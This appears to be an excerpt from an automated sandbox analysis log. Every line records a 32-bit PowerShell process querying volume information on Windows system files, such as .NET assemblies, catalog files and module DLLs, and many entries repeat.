Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.IO.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
